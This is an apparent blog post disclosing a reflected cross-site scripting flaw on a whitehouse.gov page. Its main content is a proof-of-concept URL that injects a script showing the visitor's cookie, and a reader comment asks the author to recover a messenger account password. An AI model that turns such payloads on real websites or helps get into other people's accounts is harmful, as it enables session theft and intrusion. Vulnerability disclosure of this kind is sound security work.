WhiteHouse.gov XSS Vulnerability

WhiteHouse.gov XSS Vulnerability

POC:
https://app2.whitehouse.gov/ppo/site_warning.jsp?height=200&width=300&urlloc=”><script>alert(document.cookie)</script>

Screen:

Note: You can’t do much with that, but it’s a vulnerability anyway! 🙂

Advertisements

7 thoughts on “WhiteHouse.gov XSS Vulnerability

  1. perfect frt, idolul meu , cat imi iei sa imi afli si mie parola la un id de mess? ca mi`am uitat parola… te rog mult de tot

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s